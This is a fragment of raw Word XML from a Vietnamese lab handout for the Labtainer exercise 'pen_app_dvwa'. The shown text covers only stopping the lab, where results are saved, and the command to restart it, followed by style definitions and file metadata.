        </w:rPr>
        <w:t>stoplab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3AC5F8"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Khi bài lab kết thúc, một tệp zip lưu kết quả được tạo và lưu vào một vị trí được hiển thị bên dưới stoplab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC980DB"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Khởi động lại bài lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C610927" w14:textId="77777777" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Trong quá trình làm bài sinh viên cần thực hiện lại bài lab, dùng câu lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A914D4" w14:textId="49E222B0" w:rsidR="00D50B78" w:rsidRPr="00D50B78" w:rsidRDefault="00D50B78" w:rsidP="00D50B78">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="23" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">labtainer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D50B78">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:color w:val="1F1F1F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>r pen_app_dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D54847E" w14:textId="77777777" w:rsidR="00396E6D" w:rsidRPr="00D50B78" w:rsidRDefault="00396E6D" w:rsidP="00D50B78">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00396E6D" w:rsidRPr="00D50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B78"/>
    <w:rsid w:val="00315BCF"/>
    <w:rsid w:val="00317A25"/>
    <w:rsid w:val="00396E6D"/>
    <w:rsid w:val="006F3C13"/>
    <w:rsid w:val="00851C80"/>
    <w:rsid w:val="00852B5E"/>
    <w:rsid w:val="008533DF"/>
    <w:rsid w:val="00964859"/>
    <w:rsid w:val="00AC2F73"/>
    <w:rsid w:val="00D50B78"/>
    <w:rsid w:val="00FE7D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168C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9FBCCB28-7CF7-4BB9-9652-9809CFB7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B78"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00D50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B78"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00D50B78"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D50B78"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00D50B78"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00D50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B78"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00D50B78"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D50B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0B78"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00D50B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507</Words>
  <Characters>2892</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>24</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Quyen</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Van Quyen</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-04T13:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-04T13:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>